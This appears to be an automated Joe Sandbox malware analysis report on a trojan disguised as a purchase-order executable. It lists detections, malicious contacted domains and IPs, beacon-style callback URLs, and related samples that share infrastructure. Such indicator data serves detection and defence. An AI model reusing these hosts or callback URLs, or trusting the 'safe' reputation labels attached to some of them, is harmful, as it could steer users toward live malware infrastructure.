Source	Detection	Scanner	Label	Download
0.2.Purchase Order 40,7045.exe.7f0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.Purchase Order 40,7045.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
sweetbasilmarketing.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.heartandcrowncloset.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB	0%	Avira URL Cloud	safe
http://www.placeduconfort.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW	0%	Avira URL Cloud	safe
http://www.namofast.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.hyx20140813.com/igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.ownumo.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA	0%	Avira URL Cloud	safe
http://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.primeworldgroup.com/igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.chemtradent.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.coveloungewineandwhiskey.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+	0%	Avira URL Cloud	safe
http://www.cashintl.com/igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl	100%	Avira URL Cloud	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.covid19salivatestdirect.com/igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.plantpowered.energy/igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.capitalcitybombers.com/igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.obsessingwealth.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.cashintl.com	54.208.77.124	true	true		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	true		unknown
parkingpage.namecheap.com	198.54.117.212	true	false		high
sweetbasilmarketing.com	185.201.11.126	true	false	2%, Virustotal, Browse	unknown
coveloungewineandwhiskey.com	34.102.136.180	true	true		unknown
capitalcitybombers.com	34.102.136.180	true	true		unknown
www.chemtradent.com	45.194.171.26	true	true		unknown
bailedao.leboweb.com	119.81.172.165	true	true		unknown
trafegopago.com	192.185.213.99	true	true		unknown
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	3.138.72.189	true	false		high
www.primeworldgroup.com	168.206.180.179	true	true		unknown
www.namofast.com	13.248.196.204	true	true		unknown
www.covid19salivatestdirect.com	208.91.197.160	true	true		unknown
www.ownumo.com	74.208.236.115	true	true		unknown
heartandcrowncloset.com	160.153.136.3	true	true		unknown
www.heartandcrowncloset.com	unknown	unknown	true		unknown
www.coveloungewineandwhiskey.com	unknown	unknown	true		unknown
www.trafegopago.com	unknown	unknown	true		unknown
www.placeduconfort.com	unknown	unknown	true		unknown
www.obsessingwealth.com	unknown	unknown	true		unknown
cdn.onenote.net	unknown	unknown	true		unknown
www.hyx20140813.com	unknown	unknown	true		unknown
www.capitalcitybombers.com	unknown	unknown	true		unknown
www.plantpowered.energy	unknown	unknown	true		unknown
www.sweetbasilmarketing.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.heartandcrowncloset.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB	true	Avira URL Cloud: safe	unknown
http://www.placeduconfort.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW	true	Avira URL Cloud: safe	unknown
http://www.namofast.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt	true	Avira URL Cloud: safe	unknown
http://www.hyx20140813.com/igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.ownumo.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA	true	Avira URL Cloud: safe	unknown
http://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.primeworldgroup.com/igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.chemtradent.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5	true	Avira URL Cloud: safe	unknown
http://www.coveloungewineandwhiskey.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+	true	Avira URL Cloud: safe	unknown
http://www.cashintl.com/igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: malware	unknown
http://www.covid19salivatestdirect.com/igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.plantpowered.energy/igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.capitalcitybombers.com/igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.obsessingwealth.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browsehappy.com/	netsh.exe, 00000003.00000002.500404825.000000000419D000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
119.81.172.165	unknown	Singapore	36351	SOFTLAYERUS	true
160.153.136.3	unknown	United States	21501	GODADDY-AMSDE	true
45.194.171.26	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
74.208.236.115	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
3.138.72.189	unknown	United States	16509	AMAZON-02US	false
168.206.180.179	unknown	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
13.248.196.204	unknown	United States	16509	AMAZON-02US	true
35.246.6.109	unknown	United States	15169	GOOGLEUS	true
192.185.213.99	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
208.91.197.160	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
54.208.77.124	unknown	United States	14618	AMAZON-AESUS	true
198.54.117.212	unknown	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321387
Start date:	21.11.2020
Start time:	09:21:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Purchase Order 40,7045.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@16/13
EGA Information:	Failed
HDC Information:	Successful, ratio: 66.3% (good quality ratio 61%) Quality average: 74.5% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 77
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 104.79.90.110, 51.104.139.180, 168.61.161.212, 92.122.213.247, 92.122.213.194, 52.255.188.83, 20.54.26.129, 2.17.179.193, 84.53.167.113, 51.104.144.132 Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, wildcard.weather.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
119.81.172.165	n4uladudJS.exe	Get hash	malicious	Browse	www.hyx20140813.com/igqu/?p0D=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oB+gypqC9f0&6l8l=BXeD1
	NzI1oP5E74.exe	Get hash	malicious	Browse	www.hyx20140813.com/igqu/?v6=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47rt98ClSPciiEZyTMw==&1b=V6O83JaPw
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.hyx20140813.com/igqu/?Mjq8ijoX=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oB+gypqC9f0&IR9D54=3fFxr
160.153.136.3	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr
	ORDER INQUIRY.exe	Get hash	malicious	Browse	www.downrangedynamics.com/sbmh/?h0D0gtS=QG6cmKwMcbhETcnko+puOsCD9stVZ32FtoVbr4uUzPWakgG16h92aTsXPo0YCYJv4TJJ&uTix=M4Bx
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	www.heartandcrowncloset.com/igqu/?ETmlgT7=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iGn3vBS2J6G&VR-X4=02JPGJu85hqTpbBp
	feJbFA6woA.exe	Get hash	malicious	Browse	www.chaoscraftsonthesidellc.com/d8h/?-Z=VgunWFR7381Y5NWGD/38d+jgIlwl93I0dvoxY8yGiJGKvo5r5YPI2T7dv5eWqCC1MjOFhqEKjg==&r6o=X48HMfqH7
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.brokerltsas.com/o9b2/?J484=xPJtLXbX&u6u4=6x5F27wyHYr8GgLrkuNsYvvLt7juXQeGGQ7Slpy+Q4D6/zuDF42IIFTnet9Ba0T8GtN8
	2GYiwgv3lC.exe	Get hash	malicious	Browse	www.optimizedaerialsolutions.com/fs8/?TZ=ytxhuXp&ibCxDh0P=ZCSANr2Lr/VRrptdCT4IN/fC6b10Csi3VV6k/pbEGKamPkfOX7nbct0QZLcOAF6X7SCC2nJaJg==
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?uTuD=ApdlgZ4&D818=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWvvidmO8V/zJ
	new requests.exe	Get hash	malicious	Browse	www.sacredclouddesigns.com/z0po/?sBZDvF=9MFD902CRjS5NPhXEuMBG5caDPOCQJgZBYfZlD0RA04vaZnloH66SO9mEKFdDdxwzubDPs6+OQ==&ARcPqD=djI0xT_PbHmL
	Se adjunta un nuevo pedido.exe	Get hash	malicious	Browse	www.minnesotawake.com/nt8e/?ox=VTRxrjkh&EZ80Hj=MD9f73lkVY9ttkcsRgzqGQquxxJbdd8AweQFA3pAF/CGQqKK98tRanJxIGsyNlaGbA6Y
	ORDRE9047EAR.exe	Get hash	malicious	Browse	www.i-maskup.com/g456/?NDH=2XqyTqvBPYEIIQ7C9PAVi7ToTypX/ozp68wTg3jYycB3DE2cB1BMX6ZgHt7Os8vcES1k&ArEh=dfyt9vCHiJx8
	1vwiSWvK62.exe	Get hash	malicious	Browse	www.atlaslandscapingservice.com/v82/?D618=O2MXWxIP7&Ndd8=r1MbDlvRtNnYXHylJoDkE/Zy1Hst2l17um53rflA5XJ1CwWSYicUNmmfnm3UxTD1cZy8
	WhTpMNHuhn.exe	Get hash	malicious	Browse	www.virtualtutorconnect.com/m20/?9rjL72ap=WiCpxiB8QpbIcKCxYkVzQzexgFTRw3mhrZGlmrGLLA8Rla/GmPk3EFGlPgFmGvL/hkq9&r6q=X48xPNU8z
	qpFvMReV7S.exe	Get hash	malicious	Browse	www.joyfulexpressionsbykatie.com/d9s8/?t8o=AlaEwXleqSR/bS1JT5v4bzUIYzvxHkrwTelRk3wVEiQjzofty3VDsu5oN59qsmVAuf/qvMKWvQ==&Tj=YpIp
	MC4x7Wssfg.exe	Get hash	malicious	Browse	www.nullwavemusic.com/ndk/?AdUHSz=gdJtTVD0dJ&9r4l7=QIPIaMvS97e29ZRXzBRvaIimK9PlRyG4bDbzrzEQQm5A4X6Gg/7AQ6aZOB64vKIhtgVc
	PO8479349743085.exe	Get hash	malicious	Browse	www.chaoscraftsonthesidellc.com/d8h/?2dz=onrhc&-Z1hir=VgunWFR7381Y5NWGD/38d+jgIlwl93I0dvoxY8yGiJGKvo5r5YPI2T7dv5eWqCC1MjOFhqEKjg==
	HPScan Payment 20.10.20.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?bb=VVCli0QXPpBTAhY&iB=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWvvICW+8R97J
	ScanHP20.10.20.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?5j=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWvvICW+8R97J&uTdDF=LJBxm
	PROFORMA C20201009.exe	Get hash	malicious	Browse	www.homeadventurerealty.com/t4vo/?AdsdIhj=LXGq20/+zuzAtHn+RNkJy1lnwyb+Rzif3x6XQYTahMBJ/3fV9F5xeFEAcuc7lhD7gOgr&0rn=TN6xlffxOb
	Qaizen19.10.2020.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?uV0xpr=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWsPYN3uEPYSO&0r_4=vDKxhJ1xlHYTRvA
	SKM109482.exe	Get hash	malicious	Browse	www.dbcm55.com/xnc/?ohoDP=e9A9I+HG+ESpMZxG6Lb7UfG/SGO5r7TYdIsEenmLCF213fEn7xLYVgT7YONHChJyYVJu&1bj=3fb4M84hjHXXBp
45.194.171.26	9Ul8m9FQ47.exe	Get hash	malicious	Browse	www.chemtradent.com/igqu/?VR-X4=02JPGJu85hqTpbBp&ETmlgT7=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.chemtradent.com/igqu/?Ezu=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGoKN/4QL40oV2qP0w==&Rzr=M6hL9XnpVlsp
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.chemtradent.com/igqu/?Mjq8ijoX=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEwO+UrIPV5&IR9D54=3fFxr

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
td-balancer-euw2-6-109.wixdns.net	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	35.246.6.109
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	35.246.6.109
	Invoice.exe	Get hash	malicious	Browse	35.246.6.109
	uM0FDMSqE2.exe	Get hash	malicious	Browse	35.246.6.109
	hjKM0s7CWW.exe	Get hash	malicious	Browse	35.246.6.109
	n4uladudJS.exe	Get hash	malicious	Browse	35.246.6.109
	T66DUJYHQE.exe	Get hash	malicious	Browse	35.246.6.109
	NzI1oP5E74.exe	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	KYC-DOC-11-10.exe	Get hash	malicious	Browse	35.246.6.109
	f14QUITHh3.exe	Get hash	malicious	Browse	35.246.6.109
	00d1gI2vB4.exe	Get hash	malicious	Browse	35.246.6.109
	sXNQG9jqhR.exe	Get hash	malicious	Browse	35.246.6.109
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	35.246.6.109
	SOA109216.exe	Get hash	malicious	Browse	35.246.6.109
parkingpage.namecheap.com	Order List.xlsx	Get hash	malicious	Browse	198.54.117.216
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.215
	SHIPMENT DOCUMENT.xlsx	Get hash	malicious	Browse	198.54.117.217
	jrzlwOa0UC.exe	Get hash	malicious	Browse	198.54.117.211
	invoice No_SINI0068206497.exe	Get hash	malicious	Browse	198.54.117.215
	tbzcpAZnBK.exe	Get hash	malicious	Browse	198.54.117.212
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.212
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.212
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.212
	4Dm4XBD0J5.exe	Get hash	malicious	Browse	198.54.117.217
	yo0PRvEkB3.rtf	Get hash	malicious	Browse	198.54.117.216
	RSC22091236.exe	Get hash	malicious	Browse	198.54.117.212
	PI210941.exe	Get hash	malicious	Browse	198.54.117.215
	TF20279707040104.exe	Get hash	malicious	Browse	198.54.117.212
	Shipment Approval.exe	Get hash	malicious	Browse	198.54.117.216
	sSPA66WeL6.exe	Get hash	malicious	Browse	198.54.117.218
	PSJ21840.exe	Get hash	malicious	Browse	198.54.117.210
	NA_GRAPH.EXE	Get hash	malicious	Browse	198.54.117.217
	HussCrypted.exe	Get hash	malicious	Browse	198.54.117.215
	camscanner-011022020.exe	Get hash	malicious	Browse	198.54.117.212
